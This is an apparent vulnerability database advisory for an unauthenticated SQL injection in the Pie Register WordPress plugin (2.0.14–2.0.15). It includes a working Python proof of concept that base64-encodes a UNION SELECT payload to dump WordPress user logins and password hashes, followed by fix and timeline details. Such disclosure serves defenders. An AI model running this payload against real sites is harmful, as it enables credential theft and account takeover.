Pie Register 2.0.14-2.0.15 – SQL Injection | Plugin Vulnerabilities

Description

User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ are provided to any page, by any user (anonymous or otherwise).

Proof of Concept

import requests,base64,re

url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
        "show_dash_widget":1,
        "invitaion_code":query_encoded
}
r = requests.get(url, params=params)

print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)

Affects Plugins

Fixed in 2.0.16

References

URL

https://g0blin.co.uk/g0blin-00040/

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

James Hooker

Submitter website

https://research.g0blin.co.uk

Submitter twitter

Verified

No

WPVDB ID

f0b9e57d-e319-415d-8333-48586c111108

Timeline

Publicly Published

2015-05-04 (about 11 years ago)

Added

2015-05-04 (about 11 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2014-08-01

Title

iCopyright(R) Article Tools <= 1.1.4 - SQL Injection

Published

2026-03-02

Title

CP Contact Form with Paypal < 1.3.62 - Authenticated (Contributor+) SQL Injection

Published

2022-02-18

Title

Zero Spam < 5.2.11 - Admin+ SQL Injection

Published

2023-10-30

Title

Jquery accordion slideshow < 8.2 - Authenticated (Subscriber+) SQL Injection via Shortcode

Published

2026-04-07

Title

User Registration & Membership < 5.1.3 - Subscriber+ SQLi via membership_ids[]